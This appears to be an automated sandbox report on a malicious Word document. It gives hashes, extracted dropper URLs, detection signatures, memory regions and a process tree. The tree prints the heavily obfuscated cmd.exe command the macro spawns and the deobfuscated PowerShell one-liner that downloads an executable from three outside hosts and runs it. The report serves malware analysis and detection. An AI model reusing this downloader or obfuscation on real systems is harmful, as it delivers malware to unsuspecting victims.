Resubmissions

24-07-2023 06:32

230724-haylwaag65 10

16-07-2023 18:15

230716-wwbacshb7z 10

Analysis

  • max time kernel
    119s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-07-2023 06:32

General

  • Target

    2356c0cbe09585e025c3fdfae9a004c20f3f4d9d0ff4a89d5add85974f0afade.doc

  • Size

    181KB

  • MD5

    5f894602e88263e34dcdbb2eb2da3078

  • SHA1

    c4b7c33fd3ff360cee29eaa67705dc79e4a24fdb

  • SHA256

    2356c0cbe09585e025c3fdfae9a004c20f3f4d9d0ff4a89d5add85974f0afade

  • SHA512

    7c5c71e599c360e43e134e0a0982bf36a1c1503956b4b72654bac8777d5cfb2417602db88fe225ef53f4b674ac22d187c951cd3519cbd628527c8880ea63cff1

  • SSDEEP

    1536:fe/zONq+YIv920aPPg8cmg8/TtMO80mlop3KGyIs+aiyLZMcj0TCYkd3gPdz1TW2:WoVBaPPg87gi8Bo7OwTkxmz1Cz/ptM

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://conferencesdiary.com/wp-content/uploads/templates/qjwwq.png

exe.dropper

https://www.cornink.com/wp-content/templates/dzsttm.png

exe.dropper

https://otcpress.aliencyb.org/wp-content/ttt/yhoskmc.png

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2356c0cbe09585e025c3fdfae9a004c20f3f4d9d0ff4a89d5add85974f0afade.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2428
    • C:\Windows\SYSTEM32\Cmd.exe
      Cmd VpwTzjhzWiEHlb nAWrqowVktzVzcirvOizczlm ZDAjcrBXXsVSp & %co^m^S^p^E^c% /c %lOcaLaPPdATa:~ -3, -2%^M%pRogRaMDatA:~-4, +1%, , /^V^:oN ^ , /^r" , (^SE^T j^y=^Wy ^4t xC od^ o2 Id 1e ^v^9 UD WM Qn^ BR bG QJ^ m^L^ ^j^H^ z ^H^7^}pU}JA{Gjh^aTc^2At^zoaY^Q^cci^}4^M;^YGk5ka^e^6^eH^jrX^C^b^yL;^o^yiLb^R^JisT^c^$bF z^2^s^e^xsr^WeR^fcRWonAr^vFPsp-T^Gtb^Lr^ala^y^V^tMdSg^B;3^j^)^cPi^I^rRkKs^ b$IN^ x^b,qth^TvNw8H^4e^$^e^X^(d^H^e^k^Al7D^i9cFLAd^24aN9owClA^cnRJw3Ho0^O^D^F^5.j^7^Dj^kV^a^xjp^L$oX{Rg^y^j^Fr^v^ItOC{gn^)^gnBG^sqSdCvt$^vO^ ^Yn32iYK^ ^v^6h LN^4^BH^Ty$^Y1^(d^bh^T^tch^V^aax^ex^b^rx^9oS^ ^fh^1^;^F^l'wj^eoG^xbZeLn.l^u'^C8^+y^Eiv6XU^vEv9^$X^J^+r^T^'^9s\e^F^'7Q+wd^p^IAm^ vep^ktq^Y:^aF^vN^TnOMe2n$kN=W^Vi27^R^ z^s^5^p$bh;Nc'^f^x^6^e^L9C^F6o9^'T^r^ ji^=6m 4ri^tI^X^kJ^E^KX$XG^;N^M^)Sr'DJ^@7^O'^ph^(6lt9^e^i32^l^d3^pF^8^S^F^4^.^E^f^'V^B^g2^ n^qB^p^75^.^MUc^w7^maGk^9LsxMoRN^h^moy1^g/Z^2t^u^4t^c^7^tj8^/Fe^t^4pn^E^Ie^ C^t^8Dn9qo1NcL^ ^-f^vp6^GwH^r^/QEg9Tr^3no9^5.^W^Vb1kyz^BcS^7nSfe^c9i^7^6^l4^y^a^t^j.t^isDKsR4eY3^r5^Vp^Z^5cd9t^5 ^oo^6/^DB/s^G^:^u^ls^U^3pZ^0tlNt9ahL1^@^Gkgi7ne0p^M^V.R^C^m^v^W^tZ^ot^Z4sbhz4Pd^oT/^Rks^0 en^1^t^0g^awd^ldW^pR^tm^e2eJ^T^t8^0/wP^tIRn^D^jeU^H^t^GIn^CFoZm^cnS-^yMp uw9^g^/^i^k^mk9oi^7^cLY.hXk^O3n^MZilQnn^v^r8Boysc^Yu.35^w^Z^0wS^Fw8l/Ae/3B:d^ss9^f^p0ht^C3tlChwk@DO^g8rnPmpod.a^p^qd^C^wdpw^ZSj6Hq6i/^WI^s^Urer^st^s^vam^vl^2Lpk^8mn^V^e^wLt^al/5Ms^F^S^d^woat^K^oV ^lH^CpPI^u^6x/fht^SAn^Qt^e^bZ^t^E8ni4^oQOcE^f-uR^pN^Fw7r^/6^i^ms^Po^2^vc^Kb.gNypb^r^PwaL^z^i^l^Gd^Zzs2aeML^cOYn^7^J^e^CqrUi^eXEf^P^ZncwoWCcj^C/4s^/^R9^:^q^fs^o1p^Mrtoat8Q^hFy^'Rl=Y^DB^ugq^RF^Cr^o$xn;pL^tl7nz^ce^M^Gi^jp^l^ ^qC^i^2b^7^Ve^v WQ^e.Ku^tODe^XgNVe e^qt^jSc0Xe2X^j^mObHyo^Wy-0lw^T^ReMAnbg^=^u^oD^e^3V^07^jwt$e^J^ 3^wl7alfGe^QehMj^sr^drP^IeEXwB^0o^l^yp)& , , , fO^R , ,, /^L, , %^9 , , , ^IN, , , (117^2, ,,-^3 ,^+2^ ,^ ^ ^, ) , , ^DO ,,( ,, , (,s^e^t ^aHx=!^aHx!!j^y:~%^9, 1!) , , , )&, , iF , ,%^9 , , ,, ,E^qU ,, ,^2 , , , ( , ( , (^cA^LL ,,%^aHx:~ ^+^5% ) ,) , , , ) "
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:1524
      • C:\Windows\system32\cmd.exe
        cMD , , /V:oN , /r" , (^SE^T j^y=^Wy ^4t xC od^ o2 Id 1e ^v^9 UD WM Qn^ BR bG QJ^ m^L^ ^j^H^ z ^H^7^}pU}JA{Gjh^aTc^2At^zoaY^Q^cci^}4^M;^YGk5ka^e^6^eH^jrX^C^b^yL;^o^yiLb^R^JisT^c^$bF z^2^s^e^xsr^WeR^fcRWonAr^vFPsp-T^Gtb^Lr^ala^y^V^tMdSg^B;3^j^)^cPi^I^rRkKs^ b$IN^ x^b,qth^TvNw8H^4e^$^e^X^(d^H^e^k^Al7D^i9cFLAd^24aN9owClA^cnRJw3Ho0^O^D^F^5.j^7^Dj^kV^a^xjp^L$oX{Rg^y^j^Fr^v^ItOC{gn^)^gnBG^sqSdCvt$^vO^ ^Yn32iYK^ ^v^6h LN^4^BH^Ty$^Y1^(d^bh^T^tch^V^aax^ex^b^rx^9oS^ ^fh^1^;^F^l'wj^eoG^xbZeLn.l^u'^C8^+y^Eiv6XU^vEv9^$X^J^+r^T^'^9s\e^F^'7Q+wd^p^IAm^ vep^ktq^Y:^aF^vN^TnOMe2n$kN=W^Vi27^R^ z^s^5^p$bh;Nc'^f^x^6^e^L9C^F6o9^'T^r^ ji^=6m 4ri^tI^X^kJ^E^KX$XG^;N^M^)Sr'DJ^@7^O'^ph^(6lt9^e^i32^l^d3^pF^8^S^F^4^.^E^f^'V^B^g2^ n^qB^p^75^.^MUc^w7^maGk^9LsxMoRN^h^moy1^g/Z^2t^u^4t^c^7^tj8^/Fe^t^4pn^E^Ie^ C^t^8Dn9qo1NcL^ ^-f^vp6^GwH^r^/QEg9Tr^3no9^5.^W^Vb1kyz^BcS^7nSfe^c9i^7^6^l4^y^a^t^j.t^isDKsR4eY3^r5^Vp^Z^5cd9t^5 ^oo^6/^DB/s^G^:^u^ls^U^3pZ^0tlNt9ahL1^@^Gkgi7ne0p^M^V.R^C^m^v^W^tZ^ot^Z4sbhz4Pd^oT/^Rks^0 en^1^t^0g^awd^ldW^pR^tm^e2eJ^T^t8^0/wP^tIRn^D^jeU^H^t^GIn^CFoZm^cnS-^yMp uw9^g^/^i^k^mk9oi^7^cLY.hXk^O3n^MZilQnn^v^r8Boysc^Yu.35^w^Z^0wS^Fw8l/Ae/3B:d^ss9^f^p0ht^C3tlChwk@DO^g8rnPmpod.a^p^qd^C^wdpw^ZSj6Hq6i/^WI^s^Urer^st^s^vam^vl^2Lpk^8mn^V^e^wLt^al/5Ms^F^S^d^woat^K^oV ^lH^CpPI^u^6x/fht^SAn^Qt^e^bZ^t^E8ni4^oQOcE^f-uR^pN^Fw7r^/6^i^ms^Po^2^vc^Kb.gNypb^r^PwaL^z^i^l^Gd^Zzs2aeML^cOYn^7^J^e^CqrUi^eXEf^P^ZncwoWCcj^C/4s^/^R9^:^q^fs^o1p^Mrtoat8Q^hFy^'Rl=Y^DB^ugq^RF^Cr^o$xn;pL^tl7nz^ce^M^Gi^jp^l^ ^qC^i^2b^7^Ve^v WQ^e.Ku^tODe^XgNVe e^qt^jSc0Xe2X^j^mObHyo^Wy-0lw^T^ReMAnbg^=^u^oD^e^3V^07^jwt$e^J^ 3^wl7alfGe^QehMj^sr^drP^IeEXwB^0o^l^yp)& , , , fO^R , ,, /^L, , %^9 , , , ^IN, , , (117^2, ,,-^3 ,^+2^ ,^ ^ ^, ) , , ^DO ,,( ,, , (,s^e^t ^aHx=!^aHx!!j^y:~%^9, 1!) , , , )&, , iF , ,%^9 , , ,, ,E^qU ,, ,^2 , , , ( , ( , (^cA^LL ,,%^aHx:~ ^+^5% ) ,) , , , ) "
        3⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:4136
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell $jVD=new-object Net.WebClient;$CqB='https://conferencesdiary.com/wp-content/uploads/templates/qjwwq.png@https://www.cornink.com/wp-content/templates/dzsttm.png@https://otcpress.aliencyb.org/wp-content/ttt/yhoskmc.png'.Split('@');$EXi = '696';$sRi=$env:temp+'\'+$EXi+'.exe';foreach($HNh in $CqB){try{$jVD.DownloadFile($HNh, $sRi);Start-Process $sRi;break;}catch{}}
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3272

Network

MITRE ATT&CK Matrix ATT&CK v13

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y0bdwx54.4nb.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2428-151-0x00007FFC23070000-0x00007FFC23265000-memory.dmp
    Filesize

    2.0MB

  • memory/2428-228-0x00007FFBE30F0000-0x00007FFBE3100000-memory.dmp
    Filesize

    64KB

  • memory/2428-136-0x00007FFBE30F0000-0x00007FFBE3100000-memory.dmp
    Filesize

    64KB

  • memory/2428-152-0x00007FFC23070000-0x00007FFC23265000-memory.dmp
    Filesize

    2.0MB

  • memory/2428-139-0x00007FFBE30F0000-0x00007FFBE3100000-memory.dmp
    Filesize

    64KB

  • memory/2428-137-0x00007FFC23070000-0x00007FFC23265000-memory.dmp
    Filesize

    2.0MB

  • memory/2428-140-0x00007FFC23070000-0x00007FFC23265000-memory.dmp
    Filesize

    2.0MB

  • memory/2428-141-0x00007FFC23070000-0x00007FFC23265000-memory.dmp
    Filesize

    2.0MB

  • memory/2428-142-0x00007FFC23070000-0x00007FFC23265000-memory.dmp
    Filesize

    2.0MB

  • memory/2428-143-0x00007FFC23070000-0x00007FFC23265000-memory.dmp
    Filesize

    2.0MB

  • memory/2428-144-0x00007FFC23070000-0x00007FFC23265000-memory.dmp
    Filesize

    2.0MB

  • memory/2428-145-0x00007FFC23070000-0x00007FFC23265000-memory.dmp
    Filesize

    2.0MB

  • memory/2428-147-0x00007FFC23070000-0x00007FFC23265000-memory.dmp
    Filesize

    2.0MB

  • memory/2428-148-0x00007FFC23070000-0x00007FFC23265000-memory.dmp
    Filesize

    2.0MB

  • memory/2428-146-0x00007FFBE1090000-0x00007FFBE10A0000-memory.dmp
    Filesize

    64KB

  • memory/2428-149-0x00007FFC23070000-0x00007FFC23265000-memory.dmp
    Filesize

    2.0MB

  • memory/2428-150-0x00007FFC23070000-0x00007FFC23265000-memory.dmp
    Filesize

    2.0MB

  • memory/2428-133-0x00007FFBE30F0000-0x00007FFBE3100000-memory.dmp
    Filesize

    64KB

  • memory/2428-138-0x00007FFBE30F0000-0x00007FFBE3100000-memory.dmp
    Filesize

    64KB

  • memory/2428-134-0x00007FFC23070000-0x00007FFC23265000-memory.dmp
    Filesize

    2.0MB

  • memory/2428-155-0x00007FFC23070000-0x00007FFC23265000-memory.dmp
    Filesize

    2.0MB

  • memory/2428-154-0x00007FFC23070000-0x00007FFC23265000-memory.dmp
    Filesize

    2.0MB

  • memory/2428-156-0x00007FFC23070000-0x00007FFC23265000-memory.dmp
    Filesize

    2.0MB

  • memory/2428-229-0x00007FFC23070000-0x00007FFC23265000-memory.dmp
    Filesize

    2.0MB

  • memory/2428-135-0x00007FFBE30F0000-0x00007FFBE3100000-memory.dmp
    Filesize

    64KB

  • memory/2428-153-0x00007FFBE1090000-0x00007FFBE10A0000-memory.dmp
    Filesize

    64KB

  • memory/2428-227-0x00007FFBE30F0000-0x00007FFBE3100000-memory.dmp
    Filesize

    64KB

  • memory/2428-193-0x00007FFC23070000-0x00007FFC23265000-memory.dmp
    Filesize

    2.0MB

  • memory/2428-226-0x00007FFBE30F0000-0x00007FFBE3100000-memory.dmp
    Filesize

    64KB

  • memory/2428-195-0x00007FFC23070000-0x00007FFC23265000-memory.dmp
    Filesize

    2.0MB

  • memory/2428-225-0x00007FFBE30F0000-0x00007FFBE3100000-memory.dmp
    Filesize

    64KB

  • memory/2428-204-0x00007FFC23070000-0x00007FFC23265000-memory.dmp
    Filesize

    2.0MB

  • memory/3272-200-0x00007FFBF56A0000-0x00007FFBF6161000-memory.dmp
    Filesize

    10.8MB

  • memory/3272-194-0x000002C0F2C60000-0x000002C0F2C70000-memory.dmp
    Filesize

    64KB

  • memory/3272-192-0x000002C0F2C60000-0x000002C0F2C70000-memory.dmp
    Filesize

    64KB

  • memory/3272-191-0x00007FFBF56A0000-0x00007FFBF6161000-memory.dmp
    Filesize

    10.8MB

  • memory/3272-186-0x000002C0F2BE0000-0x000002C0F2C02000-memory.dmp
    Filesize

    136KB